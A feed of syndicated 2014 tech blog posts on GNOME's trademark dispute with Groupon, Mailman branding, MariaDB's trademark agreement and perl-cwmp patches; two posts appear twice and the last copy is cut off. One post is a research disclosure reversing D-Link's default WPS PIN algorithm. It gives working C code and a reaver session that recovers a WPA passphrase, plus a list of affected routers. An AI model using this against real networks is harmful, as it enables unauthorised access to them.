Groupon Tried To Take GNOME’s Name & Failed

Post Syndicated from Bradley M. Kuhn original http://ebb.org/bkuhn/blog/2014/11/11/groupon.html

[ I’m writing this last update to this post, which I posted at 15:55
US/Eastern on 2014-11-11, above the original post (and its other update),
since the first text below is the most important message about this
siutation. (Please note that I am merely a mundane GF member, and I don’t
speak for GF in any way.) ]

There is a lesson learned here, now that Groupon has (only after public
admonishing from GNOME Foundation) decided to do what GNOME Foundation
asked them for from the start. Specifically, I’d like to point out how
it’s all too common for for-profit companies to treat non-profit charities
quite badly, even when the non-profit charity is involved in an
endeavor that the for-profit company nominally “supports”.

The GNOME
Foundation (GF) Board minutes are public; you can go and read them
. If
you do, you’ll find that for many months, GF has been spending substantial
time and resources to deal with this issue. They’ve begged Groupon to be
reasonable, and Groupon refused. Then, GF (having at least a few
politically savvy folks on their Board of Directors) decided they had to
make the (correct) political next move
and go
public
.

As a professional “Free Software politician”, I can tell you
from personal experience that going public with a private dispute is always
a gamble. It can backfire, and thus is almost always a “last
hope” before the only other option: litigation. But, Groupon’s
aggressive stance and deceitful behavior seems to have left GF with little
choice; I’d have done the same in GF’s situation. Fortunately, the gamble
paid off, and Groupon caved when they realized that GF would win —
both in the court of public opinion and in a real court later.

However, this tells us something about the ethos of Groupon as a company:
they are willing to waste the resources of a tiny non-profit charity (which
is currently run exclusively by volunteers) simply because Groupon thought
they could beat that charity down by outspending them. And, it’s not as if
it’s a charity with a mission Groupon opposes — it’s a charity
operating in a space
which Groupon
claims to love
.

I suppose I’m reacting so strongly to this because this is exactly the
kind of manipulative behavior I see every day from GPL violators. The
situations are quite analogous: a non-profit charity, standing up for a
legal right of a group of volunteer Free Software developers, is viewed by
that company like a bug the company can squash with their shoe. The
company only gives up when they realize the bug won’t die, and they’ll just
have to give up this time and let the bug live.

GF frankly and fortunately got off a little light. For my part, the
companies (and their cronies) that oppose copyleft have called me a
“copyright
troll”, “guilty of
criminal copyright abuse”
, and also accused me of enforcing the
GPL merely to “get rich” (even though my salary has been public
since 1999 and is less than all of theirs). Based on my experience with
GPL enforcement, I can assure you: Groupon had exactly two ways to go
politically: either give up almost immediately once the dispute was public
(which they did), or start attacking GF with dirty politics.

Having personally often faced the aforementioned “next political
step” by the for-profit company in similar situations, I’m thankful
that GF dodged that, and we now know that Groupon is unlikely to make dirty
political attacks against GF as their next move. However, please don’t
misread this situation: Groupon didn’t “do something nice just
because GF asked them to”, as the Groupon press people are no doubt
at this moment feeding the tech press for tomorrow’s news cycle. The real
story is: “Groupon stonewalled, wasting limited resources of a small
non-profit for months, and gave up only when the non-profit politically
outflanked them”.

My original post and update from earlier in the day on 2014-11-11 follows
as they originally appeared:

It’s probably been at least a decade, possibly more, since I saw
a a proprietary software company
attempt to take the name of an existing Free Software project
. I’m
very glad GNOME Foundation had the forethought to register their trademark,
and I’m glad they’re defending it.

It’s important to note that names are really different from copyrights.
I’ve been a regular critic of the patent and copyright systems,
particularly as applied to software. However, trademarks, while the system
has some serious flaws, has at its root a useful principle: people looking
for stuff they really want shouldn’t be confused by what they find. (I
remember as a kid the first time I got a knock-off toy and I was quite
frustrated and upset for being duped.) Trademark law is designed primarily
to prevent the public from being duped.

Trademark is also designed to prevent a new actor in the marketplace from
gaining advantage using the good name of an existing work. Of course,
that’s what Groupon is doing here, but Groupon’s position seems to have
come from the sleaziest of their attorneys and it’s completely disingenuous
Oh, we never heard of GNOME and we didn’t even search the trademark
database before filing. Meanwhile, now that you’ve contacted us, we’re
going to file a bunch more trademarks with your name in them. BTW, the
odds that they are lying about never searching the USTPO database for GNOME
are close to 100%. I have been involved with registration of many a
trademark for a Free Software project: the first thing you do is search the
trademark database. The USPTO even provides a public search engine for
it!

Finally, GNOME’s legal battle is not merely their own. Proprietary
software companies always think they can bully Free Software projects.
They figure Free Software just doesn’t matter that much and doesn’t have
the resources to fight. Of course, one major flaw in the trademark system
is that it is expensive (because of the substantial time
investment needed by trademark experts) to fight an attack like this.
Therefore, please donate to the GNOME
Foundation
to help them in this fight. This is part of a proxy war
against all proprietary software companies that think they can walk all
over a Free Software project. Thus, this issue relates to many others in
our community. We have to show the wealthy companies that Free Software
projects with limited resources are not pushovers, but non-profit charities
like GNOME Foundation cannot do this without your help.

Update on 2014-11-11 at 12:23 US/Eastern:
Groupon
responded to the GNOME Foundation publicly on their
“engineering” site
. I wrote the following comment on
that page and posted it, but of course they refused to allow me to post
a comment0, so I’ve posted my
comment here:

If you respected software freedom and the GNOME project, then you’d have
already stop trying to use their good name (which was trademarked before
your company was even founded) to market proprietary software. You say
you’d be glad to look for another name; I suspect that was GNOME
Foundation’s first request to you, wasn’t it? Are you saying the
GNOME Foundation has never asked you to change the name of the product
you’ve been calling GNOME?

Meanwhile, your comments about “open source” are suspect at
best. Most technology companies these days have little choice but to
interact in some ways with open source. I see of course, that Groupon has
released a few tidbits of code, but your website is primarily proprietary
software. (I notice, for example, a visit just to your welcome page at
groupon.com attempts to install a huge amount of proprietary Javascript on my
machine — lucky I use NoScript to reject it). Therefore, your argument
that you “love open source” is quite dubious. Someone who loves
open source doesn’t just liberate a few tidbits of their code, they embrace
it fully. To be accurate, you probably should have said: We like open
source a little bit.

Finally, your statement, which is certainly well-drafted Orwellian
marketing-speak, doesn’t actually answer
any of the points the GNOME Foundation raised with you
. According to the
GNOME Foundation, you were certainly communicating, but in the meantime you
were dubiously registering more infringing trademarks with the USPTO. The
only reasonable conclusion is that you used the communication to buy time to
stab GNOME Foundation in the back further. I do a lot of work
defending copyleft communities against
companies that try to exploit and mistreat those communities, and yours are
the exact types of manipulative tactics I often see in those
negotiations.

0While it’s
of course standard procedure for website to refuse comments, I
find it additionally disingenuous when a website looks like it
accepts comments, but then refuses some. Obviously, I don’t think
trolls should be given a free pass to submit comments, but I
rather like the solution of simply full disclosure: Groupon
should disclose that they are screening some comments.
This, BTW, is why I just use a third party application (pump.io)
for my comments. Anyone can post. 🙂

Branding GNU Mailman Headers & Footers

Post Syndicated from Bradley M. Kuhn original http://ebb.org/bkuhn/blog/2014/11/08/mailman.html

As always, when something takes me a while to figure out, I try to post
the generally useful technical information on my blog. For the
new copyleft.org site, I’ve been trying
to get all the pages branded properly with the header/footer. This was
straightforward for ikiwiki (which hosts the main site), but I spent an
hour searching around this morning for how to brand the GNU Mailman
instance
on lists.copyleft.org.

Ultimately, here’s what I had to do to get
everything branded, and I’m still not completely sure I found every spot.
It seems that if someone wanted to make a useful patch to GNU Mailman, you
could offer up a change that unifies the HTML templating and branding. In
the meantime, at least for GNU Mailman 2.1.15 as found in Debian 7
(wheezy), here’s what you have to do:

First, some of the branding details are handled in the Python code itself,
so my first action was:

# cd /var/lib/mailman/Mailman
# cp -pa htmlformat.py /etc/mailman
# ln -sf /etc/mailman/htmlformat.py htmlformat.py

I did this because htmlformat.py is not a file that the Debian
package install for Mailman puts in /etc/mailman, and I wanted
to keep track
with etckeeper that I was
modifying that file.

The primary modifications that I made to that file were in the
MailmanLogo() method, to which I added a custom footer, and
to Document.Format() method, to which I added a custom
header (at least when not self.suppress_head).
The suppress_head thing was a red flag that told me it was
likely not enough merely to change these methods to get a custom header
and footer on every page. I was right. Ultimately, I had to also change
nearly all the HTML files in /etc/mailman/en/, each of which
needed different changes based on what files they were, and there was no
clear guideline. I guess I could have
added <MM-Mailman-Footer> to every file that had
a </BODY> but didn’t have that yet to get my footer
everywhere, but in the end, I custom-hacked the whole thing.

My full
patches that I applied to all the mailman files is available on
copyleft.org
, in case you want to see how I did it.

Reversing D-Link’s WPS Pin Algorithm

Post Syndicated from Craig original http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/

While perusing the latest firmware for D-Link’s DIR-810L 80211ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers:
Call to sub_4D56F8 from getWPSPinCodeCall to sub_4D56F8 from getWPSPinCode
I first began examining this particular piece of code with the hopes of controlling part of the format string that is passed to __system. However, this data proved not to be user controllable, as the value placed in the format string is the default WPS pin for the router.

The default WPS pin itself is retrieved via a call to sub_4D56F8. Since the WPS pin is typically programmed into NVRAM at the factory, one might expect sub_4D56F8 to simply be performing some NVRAM queries, but that is not the case:
The beginning of sub_4D56F8The beginning of sub_4D56F8
This code isn’t retrieving a WPS pin at all, but instead is grabbing the router’s WAN MAC address. The MAC address is then split into its OUI and NIC components, and a tedious set of multiplications, xors, and shifts ensues (full disassembly listing here):
Break out the MAC and start munging the NICBreak out the MAC and start munging the NIC
<!–
More NIC munging
–>
While the math being performed is not complicated, determining the original programmer’s intent is not necessarily straightforward due to the assembly generated by the compiler. Take the following instruction sequence for example:
li $v0, 0x38E38E39
multu $a3, $v0

mfhi $v0
srl $v0, 1

Directly converted into C, this reads:

v0 = ((a3 * 0x38E38E39) >> 32) >> 1;

Which is just a fancy way of dividing by 9:

v0 = a3 / 9;

Likewise, most multiplication and modulus operations are also performed by various sequences of shifts, additions, and subtractions. The multu assembly instruction is only used for the above example where the high 32 bits of a product are needed, and there is nary a divu in sight.
However, after translating the entire sub_4D56F8 disassembly listing into a more palatable format, it’s obvious that this code is using a simple algorithm to generate the default WPS pin entirely from the NIC portion of the device’s WAN MAC address:

unsigned int generate_default_pin(char *buf)
{
char *mac;
char mac_address[32] = { 0 };
unsigned int oui, nic, pin;

/* Get a pointer to the WAN MAC address */
mac = lockAndGetInfo_log()->wan_mac_address;

/*
* Create a local, NULL-terminated copy of the WAN MAC (simplified from
* the original code’s sprintf/memmove loop).
*/
sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
mac[1],
mac[2],
mac[3],
mac[4],
mac[5],
mac[6],
mac[7],
mac[8],
mac[9],
mac[10],
mac[11]);

/*
* Convert the OUI and NIC portions of the MAC address to integer values.
* OUI is unused, just need the NIC.
*/
sscanf(mac_address, "%06X%06X", &oui, &nic);

/* Do some XOR munging of the NIC. */
pin = (nic ^ 0x55AA55);
pin = pin ^ (((pin & 0x0F) << 4) +
((pin & 0x0F) << 8) +
((pin & 0x0F) << 12) +
((pin & 0x0F) << 16) +
((pin & 0x0F) << 20));

/*
* The largest possible remainder for any value divided by 10,000,000
* is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
*/
pin = pin % 10000000;

/* The pin needs to be at least 7 digits long */
if(pin < 1000000)
{
/*
* The largest possible remainder for any value divided by 9 is
* 8; hence this adds at most 9,000,000 to the pin value, and at
* least 1,000,000. This guarantees that the pin will be 7 digits
* long, and also means that it won’t start with a 0.
*/
pin += ((pin % 9) * 1000000) + 1000000;
}

/*
* The final 8 digit pin is the 7 digit value just computed, plus a
* checksum digit. Note that in the disassembly, the wps_pin_checksum
* function is inlined (it’s just the standard WPS checksum implementation).
*/
pin = ((pin * 10) + wps_pin_checksum(pin));

sprintf(buf, "%08d", pin);
return pin;
}

Since the BSSID is only off-by-one from the WAN MAC, we can easily calculate any DIR-810L’s WPS pin just from a passive packet capture:

$ sudo airodump-ng mon0 -c 4

CH 4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

C0:A0:BB:EF:B3:D6 -13 0 6 0 0 4 54e WPA2 CCMP PSK dlink-B3D6

$ ./pingen C0:A0:BB:EF:B3:D7 # <— WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: ‘99767389’
[+] WPA PSK: ‘hluig79268’
[+] AP SSID: ‘dlink-B3D6′

But the DIR-810L isn’t the only device to use this algorithm. In fact, it appears to have been in use for some time, dating all the way back to 2007 when WPS was first introduced. The following is an – I’m sure – incomplete list of affected and unaffected devices:
Confirmed Affected:

DIR-810L
DIR-826L
DIR-632
DHP-1320
DIR-835
DIR-615 revs: B2, C1, E1, E3
DIR-657
DIR-827
DIR-857
DIR-451
DIR-655 revs: A3, A4, B1
DIR-825 revs: A1, B1
DIR-651
DIR-855
DIR-628
DGL-4500
DIR-601 revs: A1, B1
DIR-836L
DIR-808L
DIR-636L
DAP-1350
DAP-1555

Confirmed Unaffected:

DIR-815
DIR-505L
DIR-300
DIR-850L
DIR-412
DIR-600
DIR-685
DIR-817LW
DIR-818LW
DIR-803
DIR-845L
DIR-816L
DIR-860L
DIR-645
DIR-685
DAP-1522

Some affected devices, like the DIR-810L, generate the WPS pin from the WAN MAC; most generate it from the BSSID. A stand-alone tool implementing this algorithm can be found here, and has already been rolled into the latest Reaver Pro.

За Русия без любов

Post Syndicated from Longanlon original http://kaka-cuuka.com/3428


Русофилството и русофобството са традиционни хобита у нас и не минава ден без да попадна на разгорещен спор в интернет на тази тема. Русия наистина носи отпечатъка на своето тежко минало и се опитва да просъществува в съвременния свят и е малко тъпо да се окачествява като извор на всичко зло – поради което преди време се изказах за нея с любов. Предвид настроенията у много българи обаче, мисля, е време за няколко думи за Русия без ама никаква любов…

(Чети още…) (843 думи)


OpenFest 2014

Post Syndicated from Йовко Ламбрев original https://blog.yovko.net/openfest-2014/

Сякаш беше вчера… но всъщност, когато за първи път застанах пред публиката на OpenFest, най-старшата цифра от стойността на променливата, която обозначава възрастта ми беше двойка, а сега вече е четворка. Знам, че можех да го кажа по-разбираемо 🙂
В събота и неделя ще се случи поредният OpenFest – и всеки път е с все по-амбициозна, зряла и интересна програма. Особено тазигодишната мен лично силно ме впечатлява.
И най-хубавото – сигурно вече трето поредно поколение двадесетгодишни се грижат OpenFest да продължава да се случва!

MariaDB foundation trademark agreement

Post Syndicated from Michael "Monty" Widenius original http://monty-says.blogspot.com/2014/10/mariadb-foundation-trademark-agreement.html

We have now published the trademark agreement between the MariaDB Corporation (formerly SkySQL) and the MariaDB Foundation. This agreement guarantees that MariaDB Foundation has the rights needed to protect the MariaDB server project!With this protection, I mean to ensure that the MariaDB Foundation in turn ensures that anyone can be part of MariaDB development on equal terms (like with any other open source project).I have received some emails and read some blog posts from people who are confusing trademarks with the rights and possibilities for community developers to be part of an open source project.The MariaDB foundation was never created to protect the MariaDB trademark. It was created to ensure that what happened to MySQL would never happen to MariaDB: That people from the community could not be part of driving and developing MySQL on equal terms as other companies.I have personally never seen a conflict with having one company own the trademark of an open source product, as long as anyone can participate in the development of the product! Having a strong driver for an open source project usually ensures that there are more full-time developers working on a project than would otherwise be possible. This makes the product better and makes it useful for more people. In most cases, people are participating in an open source project because they are using it, not because they directly make money on the project.This is certainly the case with MySQL and MariaDB, but also with other projects. If the MySQL or the MariaDB trademark would have been fully owned by a foundation from a start, I think that neither project would have been as successful as they are! More about this later.Some examples of open source projects that have the trademark used or owned by a commercial parent company are WordPress (wordpress.com and WordPress.org) and Mozilla.Even when it comes to projects like Linux that are developed by many companies, the trademark is not owned by the Linux Foundation.There has been some concern that MariaDB Corporation has more developers and Maria captains (people with write access to the MariaDB repositories) on the MariaDB project than anyone else. This means that the MariaDB Corporation has more say about the MariaDB roadmap than anyone else.This is right and actually how things should be; the biggest contributors to a project are usually the ones that drive the project forward.This doesn’t, however, mean that no one else can join the development of the MariaDB project and be part of driving the road map.The MariaDB Foundation was created exactly to guarantee this.It’s the MariaDB Foundation that governs the rules of how the project is developed, under what criteria one can become a Maria captain, the rights of the Maria captains, and how conflicts in the project are resolved.Those rules are not yet fully defined, as we have had very few conflicts when it comes to accepting patches. The work on these rules have been initiated and I hope that we’ll have nice and equal rules in place soon. In all cases the rules will be what you would expect from an open source project. Any company that wants to ensure that MariaDB will continue to be a free project and wants to be part of defining the rules of the project can join the MariaDB Foundation and be part of this process!Some of the things that I think went wrong with MySQL and would not have happened if we had created a foundation similar to the MariaDB Foundation for MySQL early on:Claims that companies like Google and Ebay can’t get their patches into MySQL if they don’t pay (this was before MySQL was bought by Sun).Closed source components in MySQL, developed by the company that owns the trademark to MySQL (almost happened to MySQL in Sun and has happened in MySQL Enterprise from Oracle).Not giving community access to the roadmap.Not giving community developers write access to the official repositories of MySQL.Hiding code and critical test cases from the community.No guarantee that a patch will ever be reviewed.The MariaDB Foundation guarantees that the above things will never happen to MariaDB. In addition, the MariaDB Foundation employs people to perform reviews, provide documentation, and work actively to incorporate external contributions into the MariaDB project.This doesn’t mean that anyone can push anything into MariaDB. Any changes need to follow project guidelines and need to be reviewed and approved by at least one Maria captain. Also no MariaDB captain can object to the inclusion of a given patch except on technical merits. If things can’t be resolved among the captains and/or the user community, the MariaDB Foundation has the final word.I claimed earlier that MariaDB would never have been successful if the trademark had been fully owned by a foundation. The reason I can claim this is that we tried to do it this way and it failed! If we would have continued on this route MariaDB would probably be a dead project today!To be able to understand this, you will need a little background in MariaDB history. The main points are:Some parts of the MariaDB team and I left Sun in February 2009 to work on the Maria storage engine (now renamed to Aria).Oracle started to acquire Sun in April 2009.Monty Program Ab then hired the rest of the MariaDB engineers and started to focus on MariaDB.I was part of founding SkySQL in July 2010, as a home for MySQL support, consultants, trainers, and sales people.The MariaDB Foundation was announced in November 2012.Monty Program Ab and SkySQL Ab joined forces in April 2013.SkySQL Ab renamed itself to MariaDB Corporation in October 2014During the 4 years before the MariaDB foundation was formed, I had contacted most of the big companies that had MySQL to thank them for their success and to ask them to be part of MariaDB development. The answers were almost all the same:”We are very interested in you succeeding, but we can’t help you with money or resources until we are using MariaDB ourselves. This is only going to happen when you have proved that MariaDB will take over MySQL.”It didn’t help that most of the companies that used to pay for MySQL support had gotten scared of MySQL being sold to Oracle and had purchased 2-4 year support contracts to protect themselves against sudden price increases in MySQL support.In May 2012, after 4 years and spending close to 4 million Euros of my own money, to make MariaDB possible, I realized that something would have to change.I contacted some of the big technology companies in Silicon Valley and asked if they would be interested in being part of creating a MariaDB Foundation, where they could play bigger roles. The idea was that all the MariaDB developers from Monty Program Ab, the MariaDB trademark and other resources would move to the foundation. For this to happen, I need guarantees that the foundation would have resources to pay salaries to the MariaDB developers for at least the next 5 years.In the end two companies showed interest in doing this, but after months of discussions they both said that “now was not yet the right time to do this”.In the end I created the MariaDB Foundation with a smaller role, just to protect the MariaDB server, and got some great companies to support our work:Booking.comSkySQL (2 years!)Parallels (2 years!)AutomatticZenimaxThere was also some smaller donations from a variety of companies.See the whole list at https://mariadb.org/en/supporters.During this time, SkySQL had become the biggest supporter of MariaDB and also the biggest customer of Monty Program Ab. SkySQL provided front line support for MySQL and MariaDB and Monty Program Ab did the “level 3” support (bug fixes and enhancements for MariaDB).In the end there were only two ways to go forward to secure the financing of the MariaDB project:a) Get investors for Monty Program Abb) Sell Monty Program Ab.Note that neither of the above options would have been possible if Monty Program Ab had not owned the MariaDB trademark!Selling to SkySQL was in the end the right and logical thing to do:They have good investors who are committed to SkySQL and MariaDB.Most of the people in the two companies already know each other as most come from the old MySQL team.The MariaDB trademark was much more known than SkySQL and by owning it would make it much easier for SkySQL to expand their business.As SkySQL was the biggest supporter of the MariaDB project this felt like the right thing to do.However, to ensure the future of the MariaDB project, SkySQL and Monty Program Ab both agreed that the MariaDB Foundation was critically needed and we had to put a formal trademark agreement in place. Until now there was just a verbal promise for the MariaDB trademarks to the foundation and we had to do this legally right.This took, because of a lot of reasons too boring to bring up here, much longer time than expected. You can find the trademark agreement publicly available here. However, now this is finally done and I am happy to say that the future of MariaDB, as an open source project, is protected and there will never again be a reason for me to fork it!So feel free to join the MariaDB project, either as a developer or community contributor or as a member of the MariaDB Foundation!

MariaDB foundation trademark agreement

Post Syndicated from Michael "Monty" Widenius original http://monty-says.blogspot.com/2014/10/mariadb-foundation-trademark-agreement.html

We have now published the trademark agreement between the MariaDB Corporation (formerly SkySQL) and the MariaDB Foundation. This agreement guarantees that MariaDB Foundation has the rights needed to protect the MariaDB server project!With this protection, I mean to ensure that the MariaDB Foundation in turn ensures that anyone can be part of MariaDB development on equal terms (like with any other open source project).I have received some emails and read some blog posts from people who are confusing trademarks with the rights and possibilities for community developers to be part of an open source project.The MariaDB foundation was never created to protect the MariaDB trademark. It was created to ensure that what happened to MySQL would never happen to MariaDB: That people from the community could not be part of driving and developing MySQL on equal terms as other companies.I have personally never seen a conflict with having one company own the trademark of an open source product, as long as anyone can participate in the development of the product! Having a strong driver for an open source project usually ensures that there are more full-time developers working on a project than would otherwise be possible. This makes the product better and makes it useful for more people. In most cases, people are participating in an open source project because they are using it, not because they directly make money on the project.This is certainly the case with MySQL and MariaDB, but also with other projects. If the MySQL or the MariaDB trademark would have been fully owned by a foundation from a start, I think that neither project would have been as successful as they are! More about this later.Some examples of open source projects that have the trademark used or owned by a commercial parent company are WordPress (wordpress.com and WordPress.org) and Mozilla.Even when it comes to projects like Linux that are developed by many companies, the trademark is not owned by the Linux Foundation.There has been some concern that MariaDB Corporation has more developers and Maria captains (people with write access to the MariaDB repositories) on the MariaDB project than anyone else. This means that the MariaDB Corporation has more say about the MariaDB roadmap than anyone else.This is right and actually how things should be; the biggest contributors to a project are usually the ones that drive the project forward.This doesn’t, however, mean that no one else can join the development of the MariaDB project and be part of driving the road map.The MariaDB Foundation was created exactly to guarantee this.It’s the MariaDB Foundation that governs the rules of how the project is developed, under what criteria one can become a Maria captain, the rights of the Maria captains, and how conflicts in the project are resolved.Those rules are not yet fully defined, as we have had very few conflicts when it comes to accepting patches. The work on these rules have been initiated and I hope that we’ll have nice and equal rules in place soon. In all cases the rules will be what you would expect from an open source project. Any company that wants to ensure that MariaDB will continue to be a free project and wants to be part of defining the rules of the project can join the MariaDB Foundation and be part of this process!Some of the things that I think went wrong with MySQL and would not have happened if we had created a foundation similar to the MariaDB Foundation for MySQL early on:Claims that companies like Google and Ebay can’t get their patches into MySQL if they don’t pay (this was before MySQL was bought by Sun).Closed source components in MySQL, developed by the company that owns the trademark to MySQL (almost happened to MySQL in Sun and has happened in MySQL Enterprise from Oracle).Not giving community access to the roadmap.Not giving community developers write access to the official repositories of MySQL.Hiding code and critical test cases from the community.No guarantee that a patch will ever be reviewed.The MariaDB Foundation guarantees that the above things will never happen to MariaDB. In addition, the MariaDB Foundation employs people to perform reviews, provide documentation, and work actively to incorporate external contributions into the MariaDB project.This doesn’t mean that anyone can push anything into MariaDB. Any changes need to follow project guidelines and need to be reviewed and approved by at least one Maria captain. Also no MariaDB captain can object to the inclusion of a given patch except on technical merits. If things can’t be resolved among the captains and/or the user community, the MariaDB Foundation has the final word.I claimed earlier that MariaDB would never have been successful if the trademark had been fully owned by a foundation. The reason I can claim this is that we tried to do it this way and it failed! If we would have continued on this route MariaDB would probably be a dead project today!To be able to understand this, you will need a little background in MariaDB history. The main points are:Some parts of the MariaDB team and I left Sun in February 2009 to work on the Maria storage engine (now renamed to Aria).Oracle started to acquire Sun in April 2009.Monty Program Ab then hired the rest of the MariaDB engineers and started to focus on MariaDB.I was part of founding SkySQL in July 2010, as a home for MySQL support, consultants, trainers, and sales people.The MariaDB Foundation was announced in November 2012.Monty Program Ab and SkySQL Ab joined forces in April 2013.SkySQL Ab renamed itself to MariaDB Corporation in October 2014During the 4 years before the MariaDB foundation was formed, I had contacted most of the big companies that had MySQL to thank them for their success and to ask them to be part of MariaDB development. The answers were almost all the same:”We are very interested in you succeeding, but we can’t help you with money or resources until we are using MariaDB ourselves. This is only going to happen when you have proved that MariaDB will take over MySQL.”It didn’t help that most of the companies that used to pay for MySQL support had gotten scared of MySQL being sold to Oracle and had purchased 2-4 year support contracts to protect themselves against sudden price increases in MySQL support.In May 2012, after 4 years and spending close to 4 million Euros of my own money, to make MariaDB possible, I realized that something would have to change.I contacted some of the big technology companies in Silicon Valley and asked if they would be interested in being part of creating a MariaDB Foundation, where they could play bigger roles. The idea was that all the MariaDB developers from Monty Program Ab, the MariaDB trademark and other resources would move to the foundation. For this to happen, I need guarantees that the foundation would have resources to pay salaries to the MariaDB developers for at least the next 5 years.In the end two companies showed interest in doing this, but after months of discussions they both said that “now was not yet the right time to do this”.In the end I created the MariaDB Foundation with a smaller role, just to protect the MariaDB server, and got some great companies to support our work:Booking.comSkySQL (2 years!)Parallels (2 years!)AutomatticZenimaxThere was also some smaller donations from a variety of companies.See the whole list at https://mariadb.org/en/supporters.During this time, SkySQL had become the biggest supporter of MariaDB and also the biggest customer of Monty Program Ab. SkySQL provided front line support for MySQL and MariaDB and Monty Program Ab did the “level 3” support (bug fixes and enhancements for MariaDB).In the end there were only two ways to go forward to secure the financing of the MariaDB project:a) Get investors for Monty Program Abb) Sell Monty Program Ab.Note that neither of the above options would have been possible if Monty Program Ab had not owned the MariaDB trademark!Selling to SkySQL was in the end the right and logical thing to do:They have good investors who are committed to SkySQL and MariaDB.Most of the people in the two companies already know each other as most come from the old MySQL team.The MariaDB trademark was much more known than SkySQL and by owning it would make it much easier for SkySQL to expand their business.As SkySQL was the biggest supporter of the MariaDB project this felt like the right thing to do.However, to ensure the future of the MariaDB project, SkySQL and Monty Program Ab both agreed that the MariaDB Foundation was critically needed and we had to put a formal trademark agreement in place. Until now there was just a verbal promise for the MariaDB trademarks to the foundation and we had to do this legally right.This took, because of a lot of reasons too boring to bring up here, much longer time than expected. You can find the trademark agreement publicly available here. However, now this is finally done and I am happy to say that the future of MariaDB, as an open source project, is protected and there will never again be a reason for me to fork it!So feel free to join the MariaDB project, either as a developer or community contributor or as a member of the MariaDB Foundation!

My perl-cwmp patches are merged

Post Syndicated from Delian Delchev original http://deliantech.blogspot.com/2014/10/my-perl-cwmp-patches-are-merged.html

Hello,I’ve used perl-cwmp here and there. It is a nice, really small, really light and simple TR-069 ACS, with a very easy install and no heavy requirements. You can read the whole code for few minutes and you can make your own modifications. I am using it in a lot of small “special” cases, where you need something fast and specific, or a very complex workflow that cannot be implemented by any other ACS server.However, this project has been stalled for a while. I’ve found that a lot of modern TR-069/CWMP agents do not work well with the perl-cwmp. There are quite of few reasons behind those problems:- Some of the agents are very strict – they expect the SOAP message to be formatted in a specific way, not the way perl-cwmp does it- Some of the agents are compiled with not so smart, static expansion of the CWMP xsd file. That means they do expect string type spec in the SOAP message and strict orderingperl-cwmp do not “compile” the CWMP XSD and do not send strict requests nor interpretate the responses strictly. It does not automatically set the correct property type in the request according to the spec, because it never reads the spec. It always assume that the property type is a string.To allow perl-cwmp to be fixed and adjusted to work with those type of TR-069 agents I’ve done few modifications to the code, and I am happy to announce they have been accepted and merged to the main code:The first modification is that I’ve updated (according to the current standard) the SOAP header. It was incorrectly set and many TR069 devices I have tested (and basically all that worked with the Broadcom TR069 client) rejected the request.The second modification is that all the properties now may have specified type. Unless you specify the type it is always assumed to be a string. That will allow the ACS to set property value of agents that do a strict set check.InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#60The #…# specifies the type of the property. In the example above, we are setting value of unsignedInt 60 to PeriodicInformInterval.You can also set value to a property by reading a value from another property.For that you can use ${ property name }Here is an example how to set the PPP password to be the value of the Serial Number:InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password: ${InternetGatewayDevice.DeviceInfo.SerialNumber}And last but not least – now you can execute small code, or external script and set the value of a property to the output of that code. You can do that with $[ code ]Here is an example how to set a random value to the PeriodicInformInterval:InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#$[60 + int(rand(100))]Here is another example, how to execute external script that could take this decision:InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#$[ `./externalscript.sh ${InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.1.MACAddress} ${InternetGatewayDevice.DeviceInfo.SerialNumber}` ]The last modification I’ve done is to allow the perl-cwmp to “fork” a new process when a TR-069 request arrives. It has been single threaded code, which mean the agents has to wait until the previous task is completed. However, if the TCP listening queue is full, or the ACS very busy, some of the agents will assume there is no response and timeout. You may have to wait for 24h (the default periodic interval for some vendors) until you get your next request. Now that can be avoided.All this is very valuable for dynamic and automated configurations without the need of modification of the core code, just modifying the configuration file.

My perl-cwmp patches are merged

Post Syndicated from Delian Delchev original http://deliantech.blogspot.com/2014/10/my-perl-cwmp-patches-are-merged.html

Hello,I’ve used perl-cwmp here and there. It is a nice, really small, really light and simple TR-069 ACS, with a very easy install and no heavy requirements. You can read the whole code for few minutes and you can make your own modifications. I am using it in a lot of small “special” cases, where you need something fast and specific, or a very complex workflow that cannot be implemented by any other ACS server.However, this project has been stalled for a while. I’ve found that a lot of modern TR-069/CWMP agents do not work well with the perl-cwmp. There are quite of few reasons behind those problems:- Some of the agents are very strict – they expect the SOAP message to be formatted in a specific way, not the way perl-cwmp does it- Some of the agents are compiled with not so smart, static expansion of the CWMP xsd file. That means they do expect string type spec in the SOAP message and strict orderingperl-cwmp do not “compile” the CWMP XSD and do not send strict requests nor interpretate the responses strictly. It does not automatically set the correct property type in the request according to the spec, because it never reads the spec. It always assume that the property type is a string.To allow perl-cwmp to be fixed and adjusted to work with those type of TR-069 agents I’ve done few modifications to the code, and I am happy to announce they have been accepted and merged to the main code:The first modification is that I’ve updated (according to the current standard) the SOAP header. It was incorrectly set and many TR069 devices I have tested (and basically all that worked with the Broadcom TR069 client) rejected the request.The second modification is that all the properties now may have specified type. Unless you specify the type it is always assumed to be a string. That will allow the ACS to set property value of agents that do a strict set check.InternetGatewayDevice.ManagementServer.PeriodicInformInterval: #xsd:unsignedInt#60The #…# specifies the type of the property. In the example above, we are setting value of unsignedInt 60 to PeriodicInformInterval.You can also set value to a property by reading a value from another property.For that you can use ${ property name }Here is an example how to set the PPP password to be the value of the Serial Number:InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password: 